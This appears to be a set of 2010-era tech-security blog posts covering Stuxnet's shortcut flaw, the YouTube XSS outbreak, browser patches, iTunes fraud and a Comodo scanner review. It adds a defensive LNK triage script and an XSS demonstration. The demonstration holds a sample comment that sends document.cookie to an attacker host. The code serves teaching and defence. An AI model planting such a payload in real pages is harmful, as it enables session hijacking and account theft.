Free Credit Reports from CreditKarma

When you are looking for free credit reports, be careful where you go. There are plenty of very shady (almost evil) websites out there that offer you services that may cost you plenty if you aren't careful. Have you seen the TV commercials for one of them? I checked that one out at the Better Business Bureau and it was rated with an F. That's bad, very bad.

Recently, I've seen one service that appears to be safe and highly recommended. The Credit Karma service checked out with an A rating at the Better Business Bureau, and it's even registered as an Accredited Business there. Here's what Credit Karma says about their service:

Credit Karma believes consumers have a right to know this information with no charge or without the bait and switch of 30 days free followed by enrollment products with confusing opt outs. We subsidize our cost of pulling the credit scores by selling advertising on the site.

They offer several reports and even some tools for helping you improve your future scores. The only complaints I've seen so far are people reporting that the FICO scores are sometimes inaccurate. Since the only other FICO scores you can get are not free, you may decide you can live with results that aren't perfect.


Here’s a nice tour of the Credit Karma service that was created for Sears credit cards.

In addition to Credit Karma, another truly free place to get your annual credit reports is the Annual Credit Report site.


Not all free credit reports are created equal. You can always check with the Better Business Bureau before you give personal information to a website.

Windows Shell Shortcut Vulnerability Is Being Actively Exploited

Earlier this week, exploit code for a highly critical Windows vulnerability affecting every version of Windows from XP through Windows 7 was made public. The bad news is that malware authors are already exploiting this bug in the wild: Symantec has identified that the W32.Stuxnet worm, which spreads using this vulnerability, has already infected thousands of systems.

The shell shortcut parsing vulnerability is particularly worrisome because there is very little a user can do to stay safe. Even with AutoRun and AutoPlay disabled, a user can still be infected; all it takes is browsing to the compromised removable drive, network share or WebDAV location in Explorer, which renders the icons of the shortcuts stored there. The only preventive measure available so far is to disable the rendering of shortcut icons, but doing so basically cripples the Windows environment. To make matters worse, Steve Gibson of GRC is reporting that a security researcher has already found a way to trigger this vulnerability through favicons.

Microsoft is obviously working hard on a patch for this severe vulnerability, but an official fix may take weeks to arrive. Until then, make sure your system has up-to-date malware protection and avoid using Internet Explorer (other browsers can also be exploited, but possibly to a lesser degree).
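While waiting for the patch, an administrator can at least triage the shortcuts sitting on shares and removable media. The script below is an added example for this post, not code from Microsoft, Symantec or the author. It assumes the publicly analysed mechanism of the bug: a shortcut whose target ID list walks into the Control Panel folder and then names a file makes the shell load that file as a Control Panel DLL just to draw the icon. It parses only the ShellLinkHeader and LinkTargetIDList layouts from the MS-SHLLINK specification, matches the Control Panel CLSID anywhere inside an item rather than decoding every shell item type (an assumption kept to stay short), and reports any path that follows it; a path that is not a .cpl applet is marked suspicious. The sample shortcut it builds for the demo is constructed and is not a real malicious file.

```python
"""Triage .lnk files whose target ID list enters the Control Panel namespace
and then names a file path (added example; heuristic, not a signature)."""
import re
import struct
import sys
from dataclasses import dataclass
from typing import List, Optional

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 as stored on disk (mixed-endian GUID)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
FLAG_HAS_LINK_TARGET_IDLIST = 0x00000001
# Control Panel folder {21EC2020-3AEA-1069-A2DD-08002B30309D}, same byte order
CONTROL_PANEL_CLSID = bytes.fromhex("2020ec21ea3a6910a2dd08002b30309d")
# runs of at least four printable UTF-16LE characters inside an item
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
PATH_PREFIX = re.compile(r"^(?:[A-Za-z]:\\|\\\\)")  # drive letter or UNC path


@dataclass
class Finding:
    path: str
    suspicious: bool  # anything that is not a .cpl applet deserves a look


def parse_idlist(data: bytes) -> Optional[List[bytes]]:
    """Return the ItemID payloads from a shortcut's LinkTargetIDList, or None
    when the bytes are not a shell link or carry no ID list."""
    if len(data) < LNK_HEADER_SIZE + 2:
        return None
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        return None
    if not flags & FLAG_HAS_LINK_TARGET_IDLIST:
        return None
    pos = LNK_HEADER_SIZE
    (idlist_size,) = struct.unpack_from("<H", data, pos)
    pos += 2
    end = min(pos + idlist_size, len(data))
    items: List[bytes] = []
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", data, pos)
        if item_size == 0:  # TerminalID closes the list
            break
        if item_size < 2 or pos + item_size > end:
            break  # truncated or malformed: stop instead of over-reading
        items.append(data[pos + 2:pos + item_size])  # size field counts itself
        pos += item_size
    return items


def control_panel_paths(data: bytes) -> List[Finding]:
    """Paths that appear in items after the Control Panel folder item."""
    items = parse_idlist(data)
    if not items:
        return []
    findings: List[Finding] = []
    in_control_panel = False
    for payload in items:
        if CONTROL_PANEL_CLSID in payload:
            in_control_panel = True
            continue
        if not in_control_panel:
            continue
        for run in UTF16_RUN.findall(payload):
            text = run.decode("utf-16-le")
            if PATH_PREFIX.match(text):
                findings.append(Finding(text, not text.lower().endswith(".cpl")))
    return findings


def build_sample_lnk(target: str) -> bytes:
    """Constructed demo input, not a real shortcut from the incident: header
    with HasLinkTargetIDList set, then My Computer -> Control Panel -> an item
    carrying `target` as UTF-16LE."""
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, FLAG_HAS_LINK_TARGET_IDLIST)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))

    def item(payload: bytes) -> bytes:
        return struct.pack("<H", len(payload) + 2) + payload

    my_computer = bytes.fromhex("e04fd020ea3a6910a2d808002b30309d")
    idlist = (
        item(b"\x1f\x50" + my_computer)
        + item(b"\x2e\x80" + CONTROL_PANEL_CLSID)
        + item(b"\x00" + target.encode("utf-16-le") + b"\x00\x00")
        + b"\x00\x00"  # TerminalID
    )
    return header + struct.pack("<H", len(idlist)) + idlist


if __name__ == "__main__":
    names = sys.argv[1:]
    for name in names:
        with open(name, "rb") as fh:
            for f in control_panel_paths(fh.read()):
                print(f"{name}: {'SUSPICIOUS' if f.suspicious else 'ok'} {f.path}")
    if not names:  # no files given: run against the constructed sample
        for f in control_panel_paths(build_sample_lnk("E:\\update.tmp")):
            print(f"sample: {'SUSPICIOUS' if f.suspicious else 'ok'} {f.path}")
```

Run it as `python lnk_triage.py \\share\*.lnk` (or against a copied directory) and review every SUSPICIOUS line by hand; a legitimate shortcut to a Control Panel applet will show a .cpl under the Windows directory, whereas a shortcut on a USB stick that points the Control Panel at a file on that same stick has no honest reason to exist. The check is a triage aid only: it will miss shortcuts that reach the same code through other shell item types, so it does not replace the vendor patch or disabling icon rendering on exposed machines.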

Online Home Tech Support with Comodo Cloud Scanner

[Windows all] Have you ever heard of a software company named Comodo? I first spotted them a few years ago, when they offered a free Firewall program. Even then, I knew it was a company worth watching. Each year, Comodo seems to be offering bigger and better security apps, and many of them are free for home users.

Here’s a peek at their free protection page:


As you can see, there isn’t much in the PC security field that they don’t cover. I’m sure that I could run a safe PC using only their free offerings.

The freebie I tried most recently is called Comodo Cloud Scanner. The description for this piece of software fooled me. Quote: Scan your PC to identify malware, junk files, registry errors and hidden processes. I assumed that it was simply a scanner that advised you about security risks and offered advice. I’ll show you what I ran into and why I was so surprised.

First I downloaded and installed the 10 MB exe file. Here's what the first screen looked like:


I clicked the Scan Now button and waited while it cranked away. Here are the results I saw when it finished.


Holy Cow! Over 3000 errors?

I was surprised and a bit aggravated. The last time I saw results like this was when I was testing out some suspected scamware at MyCleanPC. Any time I see extreme results like this, I always suspect that someone is trying very hard to sell me a solution I don’t need.

At the bottom of the scan results, was this little button.


I thought about this for a few minutes. I was still angry about the results. I looked through the details of the results and they really weren’t security problems as I’d define them. Most of it was browser cache files, junk registry entries and cookies. That really pissed me off, and I decided that I had to see what kind of help they’d offer.

I clicked on the Help Me button and waited for a live connection to one of the Comodo people. A pretty basic looking chat window finally popped up and I was connected to Chris in New Jersey. Below is the dialog (I’m the subscriber):



Well, that explained it all to me. The scan is simply a ploy to get you into their online help service. I’m kind of wondering what results I’d get if I had used the Comodo System Cleaner before I had scanned. That test will have to wait on another day.

Techie Buzz Verdict:

The scan that Comodo Cloud Scanner performs on your system is very likely quite good. However, I hate the way they label the findings as Errors and Problems. The so-called errors and problems they found are the stuff that happens on your PC as a simple result of using it every day.

I will give them credit for this much: the LivePCSupport service that Comodo provided to me was professional and very timely. If you need a good remote help service, I don't think you will find many others that are priced this low. Since Comodo offers all of those free security applications, I'm sure they know how to use them to help people. I can't praise the online service because I haven't really used it; however, I wouldn't be afraid to recommend it to a newbie who could really benefit from it. Fifty bucks isn't too much for most people, especially if it saves them hours of frustration.

Techie Buzz Rating: Scanner: 2/5 (Poor) / Online Service: 3/5 (Good)

Mozilla Fixes 14 Security Issues with Firefox 3.6.7

Next week, the Black Hat Security Conference is scheduled to take place in Las Vegas. Undoubtedly, hackers attending the event are getting ready with their proofs of concept and exploits. In fact, one security analyst is already making headlines for discovering security holes in Firefox, Internet Explorer, Chrome and Safari.

In the run-up to the event, Mozilla is doing its best to keep hackers at bay by patching as many vulnerabilities as possible. Yesterday, they released Firefox 3.6.7, a recommended stability and security update. Of the 14 issues fixed, 8 are rated critical, including some that could allow remote arbitrary code execution.

The full change log along with information about each of the fixed vulnerabilities is available here. Earlier this month, Google had also patched as many as 10 vulnerabilities in a Chrome security update.

[ Download Firefox 3.6.7 ]

Safari, Internet Explorer, Firefox and Chrome Leak Sensitive User Information to Websites

Most of us don't think twice before saving sensitive information in our browser's auto-fill database. After all, browsers are desktop applications that reside on our system, so any data we store in our browser should remain private, right? Wrong.

Jeremiah Grossman, CTO of WhiteHat Security, has uncovered security holes in each of the major browsers that can be exploited by booby-trapped websites to gain access to sensitive information.

"Right at the moment a Safari user visits a website, even if they've never been there before or entered any personal information, a malicious website can uncover their first name, last name, work place, city, state, and email address", revealed Grossman in a blog post. According to his proof of concept, it is possible to fool Safari (v4 and v5) into giving up stored form auto-fill information using JavaScript, without any user intervention. Apple, which was notified about this vulnerability back in June, has yet to respond.

Internet Explorer 6 and 7 can be exploited in a similar fashion; Internet Explorer 8 appears to be safe for the moment. If you are using any of the affected browsers, it's highly recommended that you disable the built-in AutoFill functionality for the time being.

The Register is also reporting that Grossman has discovered critical XSS (cross-site scripting) vulnerabilities in Firefox and Chrome, which can be exploited to gain access to stored website passwords. Grossman is expected to reveal more at the Black Hat Security Conference, which is going to be held next week.

Apple Bans Rogue Developer: Confirms iTunes Fraud

Apple has finally stepped in to put an end to the increasing incidents of fraudulent purchases in the iTunes App Store. Last week, we reported that someone called Thuat Nguyen was purchasing his own applications using hacked iTunes accounts. In fact, apps developed by Nguyen managed to claim 42 of the top 50 spots in the App Store rankings for the Books category.

Apple has now banned Thuat Nguyen and issued the following statement to Engadget:

The developer Thuat Nguyen and his apps were removed from the App Store for violating the developer Program License Agreement, including fraudulent purchase patterns.

Developers do not receive any iTunes confidential customer data when an app is downloaded.

If your credit card or iTunes password is stolen and used on iTunes we recommend that you contact your financial institution and inquire about canceling the card and issuing a chargeback for any unauthorized transactions. We also recommend that you change your iTunes account password immediately. For more information on best practices for password security visit

According to Clayton Morris, about four hundred iTunes accounts were compromised. Apple's statement implies that the accounts were taken over through stolen passwords and card details rather than through some inherent vulnerability in iTunes. Nevertheless, Apple will be beefing up its security measures to make it harder for hacked accounts to be exploited.

YouTube XSS Vulnerability Fixed [Official Statement]

Earlier today, a critical cross-site scripting (XSS) vulnerability was uncovered in YouTube. It now appears that the source of these attacks was Ebaumsworld, with 4chan later chipping in to propagate it. Of course, each side is accusing the other of the wrongdoing.

Google swung into action fairly quickly, and the vulnerability has now been fixed. Jay Nancarrow, a spokesman for Google, reached out to us to issue the following statement:

We took swift action to fix a cross-site scripting (XSS) vulnerability on that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.

In spite of Google's swift response, the script kiddies managed to cause a fair amount of annoyance. A large selection of popular YouTube videos, especially Justin Bieber videos, was flooded with malicious comments. Fortunately, while obnoxious, most of these scripts did little damage beyond irritating viewers.

iTunes Accounts Hacked – Several Users Report Fraudulent Purchases

A little while ago, YouTube was hacked and exploited on a large scale. Unfortunately, YouTube is not the only major service to fall prey to hackers. Two iPhone application developers have uncovered what appears to be a widespread hacking of the iTunes App Store.

Patrick Thomson, the developer of the QuickReader iPhone application, was the first to notice that something was amiss, when his app was displaced in the rankings by numerous suspicious looking Vietnamese manga apps.


It appears that someone going by the name Thuat Nguyen managed to hack into people's accounts and buy his own apps to push them up the App Store rankings. Neither the scale of the attack nor the methodology used is known yet. However, the number of people who have been compromised is definitely significant. This particular thread on the MacRumors forum paints a worrisome picture: several users have been charged hundreds of dollars for purchases they never made. To make matters worse, Apple's customer care isn't being very helpful either.

If you have associated a credit/debit card with your iTunes account, you should immediately check your recent purchase history and remove your card from your iTunes profile.

Image Courtesy: Alex Brie

Warning: Highly Critical XSS Vulnerability Discovered in YouTube

It appears that YouTube is vulnerable to XSS (cross-site scripting) attacks. Details are scarce since this is a breaking story. However, according to the preliminary information available to us, it is possible to hijack cookies to gain access to a logged-in user's Gmail and YouTube accounts.

Although it's unclear who discovered this vulnerability, 4chan users are already actively exploiting it. The exploit makes use of PHP, JavaScript, and XSS, and is being spread through comments on videos: script injected into a comment runs in the browser of every logged-in user who views that page. The safest course is to log out of YouTube completely until this issue has been fixed. If you are worried that you have already viewed an infected video, delete all your cookies.
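The bug class behind this, in its simplest form, as an added example (not code from this post or from YouTube): a comment rendered into the page without output encoding, beside the encoded version, and the HttpOnly flag that keeps a script which does run from reading the session cookie. The template, the author name, the hostile comment and the attacker hostname are all constructed for the demo; the comment has the generic cookie-theft shape described above and is not the payload used in the incident.

```python
"""Stored XSS through a comment box, beside the two controls that stop it
(added example; template, comment and hostname are constructed)."""
import html
from http.cookies import SimpleCookie

# Constructed hostile comment: runs in every viewer's browser and sends
# document.cookie to a host the attacker controls.
HOSTILE_COMMENT = (
    "<script>new Image().src='http://attacker.invalid/c?'+document.cookie</script>"
)
# One value lands in element text, one inside a quoted attribute: both are
# injection points, and both need encoding.
COMMENT_TEMPLATE = '<div class="comment" data-author="{author}">{body}</div>'


def render_comment_unsafe(author: str, body: str) -> str:
    """Vulnerable: user text is dropped straight into the HTML."""
    return COMMENT_TEMPLATE.format(author=author, body=body)


def render_comment_safe(author: str, body: str) -> str:
    """Fixed: encode each value for the context it lands in. html.escape with
    quote=True turns < > & " ' into entities, which covers element text and a
    double-quoted attribute. Titles and video responses need the same
    treatment; leaving any one output path unencoded keeps the bug alive."""
    return COMMENT_TEMPLATE.format(
        author=html.escape(author, quote=True),
        body=html.escape(body, quote=True),
    )


def contains_live_script(markup: str) -> bool:
    """True if the markup would start a script element or attach an event
    handler, i.e. the injected text survived as code rather than as text."""
    lowered = markup.lower()
    return "<script" in lowered or " onerror=" in lowered or " onmouseover=" in lowered


def session_cookie_header(session_id: str) -> str:
    """Defence in depth: HttpOnly keeps document.cookie from exposing the
    session, so a script that does run cannot ship it off-site; Secure keeps
    the cookie off plaintext connections. Neither replaces output encoding."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    print("unsafe:", render_comment_unsafe("fan123", HOSTILE_COMMENT))
    print("safe:  ", render_comment_safe("fan123", HOSTILE_COMMENT))
    print("attribute break-out, unsafe:",
          render_comment_unsafe('x" onmouseover="alert(1)', "hi"))
    print("attribute break-out, safe:  ",
          render_comment_safe('x" onmouseover="alert(1)', "hi"))
    print("Set-Cookie:", session_cookie_header("abc123"))
```

Note the two separate injection points: YouTube's first fix (Update 2 below) hid comments, and the attackers moved to video titles and responses, which is exactly what happens when encoding is applied per feature instead of at every point where user text meets HTML. `html.escape` is the right tool only for HTML text and quoted-attribute contexts; text that ends up inside a `<script>` block or a URL needs the encoder for that context instead.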

Spread the word to your friends and family members and help them stay protected. We will update you as soon as we learn more.

Update 1: TheNextWeb is reporting that Justin Bieber videos are being targeted in a big way.

Update 2: YouTube has now blocked all scripts from comments. However, video titles are also vulnerable and video responses are now being used to exploit the vulnerability.

Update 3: Google has issued an official statement.

Opera 10.54 Fixes Multiple Security Issues

Opera Software has just released Opera 10.54, a highly recommended security update. This release fixes multiple security issues, including one that allowed Opera to be used as a vehicle for exploiting a flaw in font handling in the Windows operating system. Here is the full changelog:

  • Prevented Opera from being used as a vector for a font issue in the underlying operating system, as reported by Microsoft’s security team; see our advisory.
  • Fixed an extremely severe issue; details will be disclosed at a later date.
  • Fixed a highly severe issue; details will be disclosed at a later date.
  • Fixed a moderately severe issue; details will be disclosed at a later date.
  • Fixed a less severe issue; details will be disclosed at a later date.

As you can see, the Norwegian browser maker has been surprisingly vague in describing the security vulnerabilities fixed in this release. The most probable reason is responsible disclosure: Opera's changelog strongly hints that other applications (most probably other browsers) are vulnerable to the same issues, and details are being withheld until those vendors have shipped fixes too.

Last week, Opera Software released Opera 10.60 Beta 1, which propelled Opera to the front of the pack once again, in terms of rendering speed. The good news is that, if you are using Opera 10.60 Beta 1 or a newer build, you are already protected and you don’t need to downgrade to Opera 10.54.

[ Download Opera 10.54 ]